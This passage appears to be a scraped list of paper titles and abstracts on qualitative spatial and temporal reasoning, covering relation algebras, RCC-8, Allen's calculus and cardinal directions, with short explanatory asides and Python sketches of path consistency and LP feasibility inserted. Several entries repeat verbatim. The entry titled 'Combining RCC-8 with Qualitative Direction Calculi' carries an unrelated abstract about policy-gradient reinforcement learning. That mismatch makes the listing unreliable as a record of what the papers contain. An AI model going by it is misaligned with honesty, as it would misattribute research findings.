disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: A new approach to cyclic ordering of 2D orientations using ternary relation algebras paper_content: Abstract In Tarski's formalisation, the universe of a relation algebra (RA) consists of a set of binary relations. 
A first contribution of this work is the introduction of RAs whose universe is a set of ternary relations: these support rotation as an operation in addition to those present in Tarski's formalisation. Then we propose two particular RAs: a binary RA, CYC b , whose universe is a set of (binary) relations on 2D orientations; and a ternary RA, CYC t , whose universe is a set of (ternary) relations on 2D orientations. The RA CYC t , more expressive than CYC b , constitutes a new approach to cyclic ordering of 2D orientations. An atom of CYC t expresses for triples of orientations whether each of the three orientations is equal to, to the left of, opposite to, or to the right of each of the other two orientations. CYC t has 24 atoms and the elements of its universe consist of all possible 2 24 subsets of the set of all atoms. Amongst other results, 1. we provide for CYC t a constraint propagation procedure computing the closure of a problem under the different operations, and show that the procedure is polynomial, and complete for a subset including all atoms; 2. we prove that another subset, expressing only information on parallel orientations, is NP-complete; 3. we show that provided that a subset S of CYC t includes two specific elements, deciding consistency for a problem expressed in the closure of S can be polynomially reduced to deciding consistency for a problem expressed in S ; and 4. we derive from the previous result that for both RAs we “jump” from tractability to intractability if we add the universal relation to the set of all atoms. A comparison to the most closely related work in the literature indicates that the approach is promising. --- paper_title: The finest of its class: The natural point-based ternary calculus for qualitative spatial reasoning paper_content: In this paper, a ternary qualitative calculus ${\mathcal LR}$ for spatial reasoning is presented that distinguishes between left and right. A theory is outlined for ternary point-based calculi in which all the relations are invariant when all points are mapped by rotations, scalings, or translations (RST relations). For this purpose, we develop methods to determine arbitrary transformations and compositions of RST relations. We pose two criteria which we call practical and natural. ‘Practical' means that the relation system should be closed under transformations, compositions and intersections and have a finite base that is jointly exhaustive and pairwise disjoint. This implies that the well-known path consistency algorithm [10] can be used to conclude implicit knowledge. ‘Natural' calculi are close to our natural way of thinking because the base relations and their complements are connected. The main result of the paper is the identification of a maximally refined calculus amongst the practical natural RST calculi, which turns out to be very similar to Ligozat's flip-flop calculus. From that it follows, e.g., that there is no finite refinement of the TPCC calculus by Moratz et al that is closed under transformations, composition, and intersection. --- paper_title: On the consistency of cardinal directions constraints paper_content: We present a formal model for qualitative spatial reasoning with cardinal directions utilizing a co-ordinate system. Then, we study the problem of checking the consistency of a set of cardinal direction constraints. We introduce the first algorithm for this problem, prove its correctness and analyze its computational complexity. 
Utilizing the above algorithm, we prove that the consistency checking of a set of basic (i.e., non-disjunctive) cardinal direction constraints can be performed in O(n^5) time. We also show that the consistency checking of a set of unrestricted (i.e., disjunctive and non-disjunctive) cardinal direction constraints is NP-complete. Finally, we briefly discuss an extension to the basic model and outline an algorithm for the consistency checking problem of this extension. --- paper_title: Using Orientation Information for Qualitative Spatial Reasoning paper_content: A new approach to representing qualitative spatial knowledge and to spatial reasoning is presented. This approach is motivated by cognitive considerations and is based on relative orientation information about spatial environments. The approach aims at exploiting properties of physical space which surface when the spatial knowledge is structured according to conceptual neighborhood of spatial relations. The paper introduces the notion of conceptual neighborhood and its relevance for qualitative temporal reasoning. The extension of the benefits to spatial reasoning is suggested. Several approaches to qualitative spatial reasoning are briefly reviewed. Differences between the temporal and the spatial domain are outlined. A way of transferring a qualitative temporal reasoning method to the spatial domain is proposed. The resulting neighborhood-oriented representation and reasoning approach is presented and illustrated. An example for an application of the approach is discussed. --- paper_title: On the Scope of Qualitative Constraint Calculi paper_content: A central notion in qualitative spatial and temporal reasoning is the concept of qualitative constraint calculus, which captures a particular paradigm of representing and reasoning about spatial and temporal knowledge. The concept, informally used in the research community for a long time, was formally defined by Ligozat and Renz in 2004 as a special kind of relation algebra — thus emphasizing a particular type of reasoning about binary constraints. Although the concept is known to be limited it has prevailed in the community. In this paper we revisit the concept, contrast it with alternative approaches, and analyze general properties. Our results indicate that the concept of qualitative constraint calculus is both too narrow and too general: it disallows different approaches, but its setup already enables arbitrarily hard problems. --- paper_title: On the utilization of spatial structures for cognitively plausible and efficient reasoning paper_content: The authors present an approach to representing and processing qualitative orientation information which is motivated by cognitive considerations about the knowledge acquisition process. The approach to qualitative spatial reasoning is based on directional orientation information as available through perceptual processes. qualitative orientations in two-dimensional space are given by the relation between a point and a vector. A basic iconic notation for spatial orientation relations which exploits the spatial structure of the domain is presented, and a variety of ways in which these relations can be manipulated and combined for spatial reasoning is explored. > --- paper_title: Categorical methods in qualitative reasoning: the case for weak representations paper_content: This paper argues for considering qualitative spatial and temporal reasoning in algebraic and category-theoretic terms. 
A central notion in this context is that of weak representation (WR) of the algebra governing the calculus. WRs are ubiquitous in qualitative reasoning, appearing both as domains of interpretation and as constraints. Defining the category of WRs allows us to express the basic notion of satisfiability (or consistency) in a simple way, and brings clarity to the study of various variants of consistency. The WRs of many popular calculi are of interest in themselves. Moreover, the classification of WRs leads to non-trivial model-theoretic results. The paper provides a not-too-technical introduction to these topics and illustrates it with simple examples. --- paper_title: Qualitative Spatial and Temporal Reasoning: Efficient Algorithms for Everyone paper_content: In the past years a lot of research effort has been put into finding tractable subsets of spatial and temporal calculi. It has been shown empirically that large tractable subsets of these calculi not only provide efficient algorithms for reasoning problems that can be expressed with relations contained in the tractable subsets, but also surprisingly efficient solutions to the general, NP-hard reasoning problems of the full calculi. An important step in this direction was the refinement algorithm which provides a heuristic for proving tractability of given subsets of relations. In this paper we extend the refinement algorithm and present a procedure which identifies large tractable subsets of spatial and temporal calculi automatically without any manual intervention and without the need for additional NP-hardness proofs. While we can only guarantee tractability of the resulting sets, our experiments show that for RCC8 and the Interval Algebra, our procedure automatically identifies all maximal tractable subsets. Using our procedure, other researchers and practitioners can automatically develop efficient reasoning algorithms for their spatial or temporal calculi without any theoretical knowledge about how to formally analyse these calculi. --- paper_title: PelletSpatial: A Hybrid RCC-8 and RDF/OWL Reasoning and Query Engine paper_content: In this paper, we present PelletSpatial, a qualitative spatial reasoning engine implemented on top of Pellet. PelletSpatial provides consistency checking and query answering over spatial data represented with the Region Connection Calculus (RCC). It supports all RCC-8 relations as well as standard RDF/OWL semantic relations, both represented in RDF/OWL. As such, it can answer mixed SPARQL queries over both relation types. PelletSpatial implements two RCC reasoners: (a) A reasoner based on the semantics preserving translation of RCC relations to OWL-DL class axioms and (b) a reasoner based on the RCC composition table that implements a path-consistency algorithm. We discuss the details of two implementation approaches and focus on some of their respective advantages and disadvantages. --- paper_title: The RacerPro knowledge representation and reasoning system paper_content: RacerPro is a software system for building applications based on ontologies. The backbone of RacerPro is a description logic reasoner. It provides inference services for terminological knowledge as well as for representations of knowledge about individuals. Based on new optimization techniques and techniques that have been developed in the research field of description logics throughout the years, a mature architecture for typical-case reasoning tasks is provided. 
The system has been used in hundreds of research projects and industrial contexts throughout the last twelve years. W3C standards as well as detailed feedback reports from numerous users have influenced the design of the system architecture in general, and have also shaped the RacerPro knowledge representation and interface languages. With its query and rule languages, RacerPro goes well beyond standard inference services provided by other OWL reasoners. --- paper_title: SPASS Version 2.0 paper_content: Spass is an automated theorem prover for full first-order logic with equality. This system description provides an overview of recent developments in Spass 2.0, including among others an implementation of contextual rewriting, refinements of the clause normal form transformation, and enhancements of the inference engine. --- paper_title: Reasoning about Cardinal Directions between Extended Objects paper_content: Direction relations between extended spatial objects are important commonsense knowledge. Recently, Goyal and Egenhofer proposed a relation model, known as the cardinal direction calculus (CDC), for representing direction relations between connected plane regions. The CDC is perhaps the most expressive qualitative calculus for directional information, and has attracted increasing interest from areas such as artificial intelligence, geographical information science, and image retrieval. Given a network of CDC constraints, the consistency problem is deciding if the network is realizable by connected regions in the real plane. This paper provides a cubic algorithm for checking the consistency of complete networks of basic CDC constraints, and proves that reasoning with the CDC is in general an NP-complete problem. For a consistent complete network of basic CDC constraints, our algorithm returns a 'canonical' solution in cubic time. This cubic algorithm is also adapted to check the consistency of complete networks of basic cardinal constraints between possibly disconnected regions. --- paper_title: Qualitative constraint calculi: Heterogeneous verification of composition tables paper_content: In the domain of qualitative constraint reasoning, a subfield of AI which has evolved in the past 25 years, a large number of calculi for efficient reasoning about spatial and temporal entities has been developed. Reasoning techniques developed for these constraint calculi typically rely on so-called composition tables of the calculus at hand, which allow for replacing semantic reasoning by symbolic operations. Often these composition tables are developed in a quite informal, pictorial manner—a method which seems to be error-prone. In view of possible safety critical applications of qualitative calculi, however, it is desirable to formally verify these composition tables. In general, the verification of composition tables is a tedious task, in particular in cases where the semantics of the calculus depends on higher-order constructs such as sets. In this paper we address this problem by presenting a heterogeneous proof method that allows for combining a higherorder proof assistance system (such as Isabelle) with an automatic (first order) reasoner (such as SPASS or VAMPIRE). The benefit of this method is that the number of proof obligations that is to be proven interactively with a semi-automatic reasoner can be minimized to an acceptable level. 
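Several of the abstracts in this list (the constraint-calculi overview, the composition-table verification paper, and the relation-algebra survey) revolve around the same operational idea: reasoning is reduced to look-ups in a composition table combined with the path-consistency (algebraic closure) method. As a minimal illustration, the sketch below implements this for the point algebra with base relations <, =, >; the data structures and function names are my own, and the table shown is the standard point-algebra composition table rather than anything specific to the calculi cited here.

```python
from itertools import product

# Base relations of the point algebra; a relation is a frozenset of base relations.
ALL = frozenset({'<', '=', '>'})
COMP = {
    ('<', '<'): {'<'}, ('<', '='): {'<'}, ('<', '>'): {'<', '=', '>'},
    ('=', '<'): {'<'}, ('=', '='): {'='}, ('=', '>'): {'>'},
    ('>', '<'): {'<', '=', '>'}, ('>', '='): {'>'}, ('>', '>'): {'>'},
}
CONVERSE = {'<': '>', '=': '=', '>': '<'}

def compose(r, s):
    """Weak composition of two (possibly disjunctive) point-algebra relations."""
    return frozenset().union(*(COMP[a, b] for a in r for b in s))

def converse(r):
    return frozenset(CONVERSE[b] for b in r)

def path_consistency(n, constraints):
    """Naive algebraic closure on an n-variable network.
    `constraints` maps ordered pairs (i, j) to relations; missing pairs default to ALL.
    Returns the refined network, or None if some relation becomes empty."""
    net = {(i, j): ALL for i in range(n) for j in range(n) if i != j}
    for (i, j), r in constraints.items():
        net[i, j] = frozenset(r) & net[i, j]
        net[j, i] = converse(net[i, j]) & net[j, i]
    changed = True
    while changed:
        changed = False
        for i, k, j in product(range(n), repeat=3):
            if len({i, j, k}) < 3:
                continue
            refined = net[i, j] & compose(net[i, k], net[k, j])
            if not refined:
                return None                      # inconsistent network
            if refined != net[i, j]:
                net[i, j], net[j, i] = refined, converse(refined)
                changed = True
    return net

# x < y and y < z entail x < z; adding z < x makes the network inconsistent.
print(path_consistency(3, {(0, 1): {'<'}, (1, 2): {'<'}})[0, 2])                 # frozenset({'<'})
print(path_consistency(3, {(0, 1): {'<'}, (1, 2): {'<'}, (2, 0): {'<'}}))        # None
```

The same loop works for any finite calculus once COMP and CONVERSE are replaced by that calculus's weak composition and converse tables, which is precisely why the verification work cited above concentrates on getting those tables right.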
--- paper_title: Connecting qualitative spatial and temporal representations by propositional closure paper_content: This paper establishes new relationships between existing qualitative spatial and temporal representations. Qualitative spatial and temporal representation (QSTR) is concerned with abstractions of infinite spatial and temporal domains, which represent configurations of objects using a finite vocabulary of relations, also called a qualitative calculus. Classically, reasoning in QSTR is based on constraints. An important task is to identify decision procedures that are able to handle constraints from a single calculus or from several calculi. In particular the latter aspect is a longstanding challenge due to the multitude of calculi proposed. In this paper we consider propositional closures of qualitative constraints which enable progress with respect to the longstanding challenge. Propositional closure allows one to establish several translations between distinct calculi. This enables joint reasoning and provides new insights into computational complexity of individual calculi. We conclude that the study of propositional languages instead of previously considered purely relational languages is a viable research direction for QSTR leading to expressive formalisms and practical algorithms. --- paper_title: An Algebra of Qualitative Taxonomical Relations for Ontology Alignments paper_content: Algebras of relations were shown useful in managing ontology alignments. They make it possible to aggregate alignments disjunctively or conjunctively and to propagate alignments within a network of ontologies. The previously considered algebra of relations contains taxonomical relations between classes. However, compositional inference using this algebra is sound only if we assume that classes which occur in alignments have nonempty extensions. Moreover, this algebra covers relations only between classes. Here we introduce a new algebra of relations, which, first, solves the limitation of the previous one, and second, incorporates all qualitative taxonomical relations that occur between individuals and concepts, including the relations "is a" and "is not". We prove that this algebra is coherent with respect to the simple semantics of alignments. --- paper_title: Reasoning about temporal relations: a maximal tractable subclass of Allen's interval algebra paper_content: We introduce a new subclass of Allen's interval algebra we call "ORD-Horn subclass," which is a strict superset of the "pointisable subclass." We prove that reasoning in the ORD-Horn subclass is a polynomial-time problem and show that the path-consistency method is sufficient for deciding satisfiability. Further, using an extensive machine-generated case analysis, we show that the ORD-Horn subclass is a maximal tractable subclass of the full algebra (assuming P≠NP). In fact, it is the unique greatest tractable subclass amongst the subclasses that contain all basic relations. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. 
We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: Relation Algebras and their Application in Temporal and Spatial Reasoning paper_content: Qualitative temporal and spatial reasoning is in many cases based on binary relations such as before, after, starts, contains, contact, part of, and others derived from these by relational operators. The calculus of relation algebras is an equational formalism; it tells us which relations must exist, given several basic operations, such as Boolean operations on relations, relational composition and converse. Each equation in the calculus corresponds to a theorem, and, for a situation where there are only finitely many relations, one can construct a composition table which can serve as a look up table for the relations involved. Since the calculus handles relations, no knowledge about the concrete geometrical objects is necessary. In this sense, relational calculus is "pointless". Relation algebras were introduced into temporal reasoning by Allen (1983, Communications of the ACM 26(1), 832--843) and into spatial reasoning by Egenhofer and Sharma (1992, Fifth International Symposium on Spatial Data Handling, Charleston, SC). The calculus of relation algebras is also well suited to handle binary constraints as demonstrated e.g. by Ladkin and Maddux (1994, Journal of the ACM 41(3), 435--469). In the present paper I will give an introduction to relation algebras, and an overview of their role in qualitative temporal and spatial reasoning. --- paper_title: A new approach to cyclic ordering of 2D orientations using ternary relation algebras paper_content: Abstract In Tarski's formalisation, the universe of a relation algebra (RA) consists of a set of binary relations. A first contribution of this work is the introduction of RAs whose universe is a set of ternary relations: these support rotation as an operation in addition to those present in Tarski's formalisation. Then we propose two particular RAs: a binary RA, CYC_b, whose universe is a set of (binary) relations on 2D orientations; and a ternary RA, CYC_t, whose universe is a set of (ternary) relations on 2D orientations. The RA CYC_t, more expressive than CYC_b, constitutes a new approach to cyclic ordering of 2D orientations. An atom of CYC_t expresses for triples of orientations whether each of the three orientations is equal to, to the left of, opposite to, or to the right of each of the other two orientations. CYC_t has 24 atoms and the elements of its universe consist of all possible 2^24 subsets of the set of all atoms. Amongst other results, 1. we provide for CYC_t a constraint propagation procedure computing the closure of a problem under the different operations, and show that the procedure is polynomial, and complete for a subset including all atoms; 2. we prove that another subset, expressing only information on parallel orientations, is NP-complete; 3.
we show that provided that a subset S of CYC t includes two specific elements, deciding consistency for a problem expressed in the closure of S can be polynomially reduced to deciding consistency for a problem expressed in S ; and 4. we derive from the previous result that for both RAs we “jump” from tractability to intractability if we add the universal relation to the set of all atoms. A comparison to the most closely related work in the literature indicates that the approach is promising. --- paper_title: The finest of its class: The natural point-based ternary calculus for qualitative spatial reasoning paper_content: In this paper, a ternary qualitative calculus ${\mathcal LR}$ for spatial reasoning is presented that distinguishes between left and right. A theory is outlined for ternary point-based calculi in which all the relations are invariant when all points are mapped by rotations, scalings, or translations (RST relations). For this purpose, we develop methods to determine arbitrary transformations and compositions of RST relations. We pose two criteria which we call practical and natural. ‘Practical' means that the relation system should be closed under transformations, compositions and intersections and have a finite base that is jointly exhaustive and pairwise disjoint. This implies that the well-known path consistency algorithm [10] can be used to conclude implicit knowledge. ‘Natural' calculi are close to our natural way of thinking because the base relations and their complements are connected. The main result of the paper is the identification of a maximally refined calculus amongst the practical natural RST calculi, which turns out to be very similar to Ligozat's flip-flop calculus. From that it follows, e.g., that there is no finite refinement of the TPCC calculus by Moratz et al that is closed under transformations, composition, and intersection. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: Relation Algebras and their Application in Temporal and Spatial Reasoning paper_content: Qualitative temporal and spatial reasoning is in many cases based on binary relations such as before, after, starts, contains, contact, part of, and others derived from these by relational operators. The calculus of relation algebras is an equational formalism; it tells us which relations must exist, given several basic operations, such as Boolean operations on relations, relational composition and converse. 
Each equation in the calculus corresponds to a theorem, and, for a situation where there are only finitely many relations, one can construct a composition table which can serve as a look up table for the relations involved. Since the calculus handles relations, no knowledge about the concrete geometrical objects is necessary. In this sense, relational calculus is "pointless". Relation algebras were introduced into temporal reasoning by Allen (1983, Communications of the ACM 26(1), 832--843) and into spatial reasoning by Egenhofer and Sharma (1992, Fifth International Symposium on Spatial Data Handling, Charleston, SC). The calculus of relation algebras is also well suited to handle binary constraints as demonstrated e.g. by Ladkin and Maddux (1994, Journal of the ACM 41(3), 435--469). In the present paper I will give an introduction to relation algebras, and an overview of their role in qualitative temporal and spatial reasoning. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: A Condensed Semantics for Qualitative Spatial Reasoning About Oriented Straight Line Segments paper_content: More than 15 years ago, a set of qualitative spatial relations between oriented straight line segments (dipoles) was suggested by Schlieder. However, it turned out to be difficult to establish a sound constraint calculus based on these relations. In this paper, we present the results of a new investigation into dipole constraint calculi which uses algebraic methods to derive sound results on the composition of relations of dipole calculi. This new method, which we call condensed semantics, is based on an abstract symbolic model of a specific fragment of our domain. It is based on the fact that qualitative dipole relations are invariant under orientation preserving affine transformations. The dipole calculi allow for a straightforward representation of prototypical reasoning tasks for spatial agents. As an example, we show how to generate survey knowledge from local observations in a street network. The example illustrates the fast constraint-based reasoning capabilities of dipole calculi. We integrate our results into two reasoning tools which are publicly available. --- paper_title: On the consistency problem for the INDU calculus paper_content: In this paper, we further investigate the consistency problem for the qualitative temporal calculus INDU introduced by A. K. Pujari et al. (1999). We prove the intractability of the consistency problem for the subset of preconvex relations. On the other hand, we show the tractability of strongly preconvex relations. 
Furthermore, we also define another interesting set of relations for which the consistency problem can be decided by a method similar to the usual path-consistency method. --- paper_title: Relations between spatial calculi about directions and orientations paper_content: Qualitative spatial descriptions characterize essential properties of spatial objects or configurations by relying on relative comparisons rather than measuring. Typically, in qualitative approaches only relatively coarse distinctions between configurations are made. Qualitative spatial knowledge can be used to represent incomplete and underdetermined knowledge in a systematic way. This is especially useful if the task is to describe features of classes of configurations rather than individual configurations. ::: ::: Although reasoning with them is generally NP-hard (even ∃IR-complete), relative directions are important because they play a key role in human spatial descriptions and there are several approaches how to represent them using qualitative methods. In these approaches directions between spatial locations can be expressed as constraints over infinite domains, e.g. the Euclidean plane. The theory of relation algebras has been successfully applied to this field. Viewing relation algebras as universal algebras and applying and modifying standard tools from universal algebra in this work, we (re)define notions of qualitative constraint calculus, of homomorphism between calculi, and of quotient of calculi. Based on this method we derive important properties for spatial calculi from corresponding properties of related calculi. From a conceptual point of view these formal mappings between calculi are a means to translate between different granularities. --- paper_title: Consistency in Networks of Relations paper_content: Artificial intelligence tasks which can be formulated as constraint satisfaction problems, with which this paper is for the most part concerned, are usually by solved backtracking the examining the thrashing behavior that nearly always accompanies backtracking, identifying three of its causes and proposing remedies for them we are led to a class of algorithms whoch can profitably be used to eliminate local (node, arc and path) inconsistencies before any attempt is made to construct a complete solution. A more general paradigm for attacking these tasks is the altenation of constraint manipulation and case analysis producing an OR problem graph which may be searched in any of the usual ways. ::: ::: Many authors, particularly Montanari and Waltz, have contributed to the development of these ideas; a secondary aim of this paper is to trace that history. The primary aim is to provide an accessible, unified framework, within which to present the algorithms including a new path consistency algorithm, to discuss their relationships and the may applications, both realized and potential of network consistency algorithms. --- paper_title: Qualitative spatial and temporal reasoning with AND/OR linear programming paper_content: This paper explores the use of generalized linear programming techniques to tackle two long-standing problems in qualitative spatio-temporal reasoning: Using LP as a unifying basis for reasoning, one can jointly reason about relations from different qualitative calculi. Also, concrete entities (fixed points, regions fixed in shape and/or position, etc.) can be mixed with free variables. Both features are important for applications but cannot be handled by existing techniques. 
In this paper we discuss properties of encoding constraint problems involving spatial and temporal relations. We advocate the use of AND/OR graphs to facilitate efficient reasoning and we show feasibility of our approach. --- paper_title: Qualitative constraint satisfaction problems: An extended framework with landmarks paper_content: Dealing with spatial and temporal knowledge is an indispensable part of almost all aspects of human activity. The qualitative approach to spatial and temporal reasoning, known as Qualitative Spatial and Temporal Reasoning (QSTR), typically represents spatial/temporal knowledge in terms of qualitative relations (e.g., to the east of, after), and reasons with spatial/temporal knowledge by solving qualitative constraints. When formulating qualitative constraint satisfaction problems (CSPs), it is usually assumed that each variable could be ''here, there and everywhere''. Practical applications such as urban planning, however, often require a variable to take its value from a certain finite domain, i.e. it is required to be 'here or there, but not everywhere'. Entities in such a finite domain often act as reference objects and are called ''landmarks'' in this paper. The paper extends the classical framework of qualitative CSPs by allowing variables to take values from finite domains. The computational complexity of the consistency problem in this extended framework is examined for the five most important qualitative calculi, viz. Point Algebra, Interval Algebra, Cardinal Relation Algebra, RCC5, and RCC8. We show that all these consistency problems remain in NP and provide, under practical assumptions, efficient algorithms for solving basic constraints involving landmarks for all these calculi. --- paper_title: Combining RCC-8 with Qualitative Direction Calculi : Algorithms and Complexity ∗ paper_content: We investigate the problem of non-covariant behavior of policy gradient reinforcement learning algorithms. The policy gradient approach is amenable to analysis by information geometric methods. This leads us to propose a natural metric on controller parameterization that results from considering the manifold of probability distributions over paths induced by a stochastic controller. Investigation of this approach leads to a covariant gradient ascent rule. Interesting properties of this rule are discussed, including its relation with actor-critic style reinforcement learning algorithms. The algorithms discussed here are computationally quite efficient and on some interesting problems lead to dramatic performance improvement over noncovariant rules. --- paper_title: Qualitative Spatio-Temporal Reasoning with RCC-8 and Allen's Interval Calculus: Computational Complexity paper_content: There exist a number of qualitative constraint calculi that are used to represent and reason about temporal or spatial configurations. However, there are only very few approaches aiming to create a spatio-temporal constraint calculus. Similar to Bennett et al., we start with the spatial calculus RCC-8 and Allen's interval calculus in order to construct a qualitative spatio-temporal calculus. As we will show, the basic calculus is NP-complete, even if we only permit base relations. When adding the restriction that the size of the spatial regions persists over time, or that changes are continuous, the calculus becomes more useful, but the satisfiability problem appears to be much harder. Nevertheless, we are able to show that satisfiability is still in NP. 
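The AND/OR linear programming entry above argues for LP as a unifying reasoning backend. As a hedged sketch of the basic idea, and not the encoding of the cited paper, the fragment below maps simple qualitative order constraints between points onto linear inequalities and asks an LP solver for feasibility. SciPy is assumed to be available, and the epsilon used to approximate strict inequalities is a common practical workaround rather than part of any formal encoding.

```python
# Minimal sketch: qualitative point constraints as a linear feasibility problem.
import numpy as np
from scipy.optimize import linprog

EPS = 1e-3

def feasible(n_vars, constraints):
    """constraints: list of (i, rel, j) with rel in {'<', '<=', '='} over point variables."""
    A_ub, b_ub, A_eq, b_eq = [], [], [], []
    for i, rel, j in constraints:
        row = np.zeros(n_vars)
        row[i], row[j] = 1.0, -1.0                 # encodes x_i - x_j
        if rel == '<':
            A_ub.append(row); b_ub.append(-EPS)    # x_i - x_j <= -eps approximates x_i < x_j
        elif rel == '<=':
            A_ub.append(row); b_ub.append(0.0)
        elif rel == '=':
            A_eq.append(row); b_eq.append(0.0)
    res = linprog(c=np.zeros(n_vars),
                  A_ub=np.array(A_ub) if A_ub else None,
                  b_ub=np.array(b_ub) if b_ub else None,
                  A_eq=np.array(A_eq) if A_eq else None,
                  b_eq=np.array(b_eq) if b_eq else None,
                  bounds=[(None, None)] * n_vars)
    return res.success

# x0 < x1, x1 < x2, x2 = x0 has no solution over the reals.
print(feasible(3, [(0, '<', 1), (1, '<', 2), (2, '=', 0)]))   # False
```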
--- paper_title: Qualitative Representation of Spatial Knowledge paper_content: Qualitativeness.- A cognitive perspective on knowledge representation.- Qualitative representation of positions in 2-D.- Reasoning with qualitative representations.- Applications.- Extensions of the basic model.- Relevant related work.- Conclusion. --- paper_title: Multi-Dimensional Modal Logic as a Framework for Spatio-Temporal Reasoning paper_content: In this paper we advocate the use of multi-dimensional modal logics as a framework for knowledge representation and, in particular, for representing spatio-temporal information. We construct a two-dimensional logic capable of describing topological relationships that change over time. This logic, called PSTL (Propositional Spatio-Temporal Logic) is the Cartesian product of the well-known temporal logic PTL and the modal logic S4u, which is the Lewis system S4 augmented with the universal modality. Although it is an open problem whether the full PSTL is decidable, we show that it contains decidable fragments into which various temporal extensions (both point-based and interval based) of the spatial logic RCC-8 can be embedded. We consider known decidability and complexity results that are relevant to computation with multi-dimensional formalisms and discuss possible directions for further research. --- paper_title: Viewing composition tables as axiomatic systems paper_content: Axiomatic systems and composition tables are often seen asalternative ways of specifying the semantic interrelations ofrelations for qualitative reasoning. Axiomatic characterizationsusually specify ontological assumptions concerning the domain ofthe relations and introduce a taxonomic system of relations that,on the one hand, serves to specify the relations and, on the otherhand, supports the communication of the intended meaning.In thisarticle, composition tables are seen as a specific form ofaxiomatic theories that can also be combined with a taxonomicsystem of relations. On this basis, the content of compositiontables can be reformulated in a simplified way. This simplificationsupports the construction of such tables parallel to thedevelopment of the axiomatic specification or on the basis of agiven axiomatic characterization. --- paper_title: Spatial reasoning in RCC-8 with Boolean region terms paper_content: We extend the expressive power of the region connection calculus RCC-8 by allowing applications of the 8 binary relations of RCC-8 not only to atomic regions but also to Boolean combinations of them. It is shown that the statisfiability problem for the extended language in arbitrary topological spaces is still in NP; however, it becomes PSPACE-complete if only the Euclidean spaces ℝn, n > 0, are regarded as possible interpretations. In particular, in contrast to pure RCC-8, the new language is capable of distinguishing between connected and non-connected topological spaces. --- paper_title: Multidimensional Mereotopology with Betweenness paper_content: Qualitative reasoning about commonsense space often involves entities of different dimensions. We present a weak axiomatization of multidimensional qualitative space based on 'relative dimension' and dimension-independent 'containment' which suffice to define basic dimension-dependent mereotopological relations. We show the relationships to other meoreotopologies and to incidence geometry. 
The extension with betweenness, a primitive of relative position, results in a first-order theory that qualitatively abstracts ordered incidence geometry. --- paper_title: The Mathematical Morpho-Logical View on Reasoning about Space paper_content: Qualitative reasoning about mereotopological relations has been extensively investigated, while more recently geometrical and spatio-temporal reasoning are gaining increasing attention. We propose to consider mathematical morphology operators as the inspiration for a new language and inference mechanism to reason about space. Interestingly, the proposed morpho-logic captures not only traditional mereotopological relations, but also notions of relative size and morphology. The proposed representational framework is a hybrid arrow logic theory for which we define a resolution calculus which is, to the best of our knowledge, the first such calculus for arrow logics. --- paper_title: An Axiomatic Approach to the Spatial Relations Underlying Left-Right and in Front of-Behind paper_content: This paper presents an axiomatic characterization of spatial orderings in the plane and of concepts underlying intrinsic and deictic uses of spatial terms such as in front of, behind, left and right. This characterization differs in several aspects from existing theories that either employ systems of coordinate axes or systems of regions to specify the meaning of such expressions. We argue that the relations given by in front of and behind can be modeled on the basis of linear orders and on the basis of axes, whereas the relations given by left and right can be modeled as planar and on the basis of regions. The explicit characterization of the means necessary to specify the intrinsic and deictic uses thereby sheds light on the structures contributed by different frames of reference and therefore contributes to understanding the deictic/intrinsic-distinction. --- paper_title: Logical Representations for Automated Reasoning about Spatial Relationships paper_content: This thesis investigates logical representations for describing and reasoning about spatial situations. Previously proposed theories of spatial regions are investigated in some detail - especially the 1st-order theory of Randell, Cui and Cohn (1992). The difficulty of achieving effective automated reasoning with these systems is observed. A new approach is presented, based on encoding spatial relations in formulae of 0-order ('propositional') logics. It is proved that entailment, which is valid according to the standard semantics for these logics, is also valid with respect to the spatial interpretation. Consequently, well-known mechanisms for propositional reasoning can be applied to spatial reasoning. Specific encodings of topological relations into both the modal logic S4 and the intuitionistic propositional calculus are given. The complexity of reasoning using the intuitionistic representation is examined and a procedure is presented which is shown to be of O(n^3) complexity in the number of relations involved. In order to make this kind of representation sufficiently expressive the concepts of model constraint and entailment constraint are introduced. By means of this distinction a 0-order formula may be used either to assert or to deny that a certain spatial constraint holds of some situation. It is shown how the proof theory of a 0-order logical language can be extended by a simple meta-level generalisation to accommodate a representation involving these two types of formula.
